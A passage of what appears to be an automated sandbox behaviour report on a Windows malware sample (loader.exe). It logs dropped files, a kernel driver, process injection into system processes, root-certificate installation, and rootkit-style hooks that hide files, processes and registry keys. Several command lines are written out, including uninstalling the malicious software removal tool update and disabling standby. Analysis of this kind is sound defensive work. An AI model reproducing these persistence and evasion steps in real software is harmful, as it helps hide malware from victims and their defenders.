        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0Jump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\dialer.exe C:\Windows\system32\dialer.exeJump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeProcess created: C:\Windows\System32\dialer.exe dialer.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
        Source: C:\Users\user\Desktop\loader.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\dialer.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\dialer.exeSection loaded: iphlpapi.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: cryptbase.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: rsaenh.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: sspicli.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: powrprof.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: umpdc.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: mswsock.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: dhcpcsvc.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: dnsapi.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: napinsp.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: pnrpnsp.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: wshbth.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: nlaapi.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: winrnr.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: rasadhlp.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\dialer.exeSection loaded: wbemcomn.dll
        Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dll
        Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dll
        Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\dialer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: loader.exeStatic PE information: Image base 0x140000000 > 0x60000000
        Source: loader.exeStatic file information: File size 5502728 > 1048576
        Source: loader.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x52e200
        Source: loader.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: wepulfrfkvoz.exe, 00000019.00000003.1877581425.000001B8C6200000.00000004.00000001.00020000.00000000.sdmp
        Source: loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
        Source: C:\Windows\System32\dialer.exeCode function: 43_2_00000001408460F0 LoadLibraryA,GetProcAddressForCaller,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,43_2_00000001408460F0
        Source: loader.exeStatic PE information: section name: .00cfg
        Source: wepulfrfkvoz.exe.0.drStatic PE information: section name: .00cfg
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC62ACDD push rcx; retf 003Fh20_2_00000225DC62ACDE
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC65C6DD push rcx; retf 003Fh20_2_00000225DC65C6DE
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC68ACDD push rcx; retf 003Fh20_2_00000225DC68ACDE
        Source: C:\Windows\System32\winlogon.exeCode function: 20_2_00000225DC6BC6DD push rcx; retf 003Fh20_2_00000225DC6BC6DE
        Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0ACACDD push rcx; retf 003Fh26_2_00000202C0ACACDE
        Source: C:\Windows\System32\lsass.exeCode function: 26_2_00000202C0AFC6DD push rcx; retf 003Fh26_2_00000202C0AFC6DE
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A6612EACDD push rcx; retf 003Fh29_2_000002A6612EACDE
        Source: C:\Windows\System32\svchost.exeCode function: 29_2_000002A66131C6DD push rcx; retf 003Fh29_2_000002A66131C6DE
        Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAEDDACDD push rcx; retf 003Fh30_2_000002BAAEDDACDE
        Source: C:\Windows\System32\dwm.exeCode function: 30_2_000002BAAEE0C6DD push rcx; retf 003Fh30_2_000002BAAEE0C6DE
        Source: C:\Windows\System32\dialer.exeCode function: 42_2_0000000140001394 push qword ptr [0000000140009004h]; ret 42_2_0000000140001403
        Source: C:\Windows\System32\svchost.exeCode function: 45_2_0000026A879AACDD push rcx; retf 003Fh45_2_0000026A879AACDE
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_000001795378ACDD push rcx; retf 003Fh46_2_000001795378ACDE
        Source: C:\Windows\System32\svchost.exeCode function: 46_2_00000179537BC6DD push rcx; retf 003Fh46_2_00000179537BC6DE
        Source: C:\Windows\System32\svchost.exeCode function: 47_2_000002295D54ACDD push rcx; retf 003Fh47_2_000002295D54ACDE
        Source: C:\Windows\System32\svchost.exeCode function: 47_2_000002295D57C6DD push rcx; retf 003Fh47_2_000002295D57C6DE
        Source: C:\Windows\System32\svchost.exeCode function: 50_2_00000253067EACDD push rcx; retf 003Fh50_2_00000253067EACDE
        Source: C:\Windows\System32\svchost.exeCode function: 50_2_0000025306E7C6DD push rcx; retf 003Fh50_2_0000025306E7C6DE
        Source: C:\Windows\System32\svchost.exeCode function: 51_2_000001845B3DC6DD push rcx; retf 003Fh51_2_000001845B3DC6DE
        Source: C:\Windows\System32\svchost.exeCode function: 53_2_000001ADECD5C6DD push rcx; retf 003Fh53_2_000001ADECD5C6DE
        Source: C:\Windows\System32\svchost.exeCode function: 54_2_000001D55905ACDD push rcx; retf 003Fh54_2_000001D55905ACDE
        Source: C:\Windows\System32\svchost.exeCode function: 54_2_000001D55908C6DD push rcx; retf 003Fh54_2_000001D55908C6DE
        Source: C:\Windows\System32\svchost.exeCode function: 55_2_00000241A9EBC6DD push rcx; retf 003Fh55_2_00000241A9EBC6DE
        Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001CD7317ACDD push rcx; retf 003Fh56_2_000001CD7317ACDE
        Source: C:\Windows\System32\svchost.exeCode function: 56_2_000001CD731AC6DD push rcx; retf 003Fh56_2_000001CD731AC6DE
        Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002824E87ACDD push rcx; retf 003Fh57_2_000002824E87ACDE
        Source: C:\Windows\System32\svchost.exeCode function: 57_2_000002824E8AC6DD push rcx; retf 003Fh57_2_000002824E8AC6DE
        Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000021B473DACDD push rcx; retf 003Fh58_2_0000021B473DACDE
        Source: C:\Windows\System32\svchost.exeCode function: 58_2_0000021B47B4C6DD push rcx; retf 003Fh58_2_0000021B47B4C6DE

        Persistence and Installation Behavior

        barindex
        Installs new ROOT certificates
        Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
        Source: C:\Windows\System32\lsass.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
        Sample is not signed and drops a device driver
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeFile created: C:\Windows\TEMP\gyqerfjfsbie.sysJump to behavior
        Source: C:\Users\user\Desktop\loader.exeFile created: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeJump to dropped file
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeFile created: C:\Windows\Temp\gyqerfjfsbie.sysJump to dropped file
        Source: C:\Users\user\Desktop\loader.exeFile created: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeJump to dropped file
        Source: C:\ProgramData\lohebxwbndwd\wepulfrfkvoz.exeFile created: C:\Windows\Temp\gyqerfjfsbie.sysJump to dropped file
        Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "NUTGFFPE"

        Hooking and other Techniques for Hiding and Protection

        barindex
        Hooks files or directories query functions (used to hide files and directories)
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
        Hooks processes query functions (used to hide processes)
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
        Hooks registry keys query functions (used to hide registry keys)
        Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
        Loading BitLocker PowerShell Module
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Modifies the prolog of user mode functions (user mode inline hooks)
        Source: explorer.exeUser mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
        Source: C:\Windows\System32\lsass.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
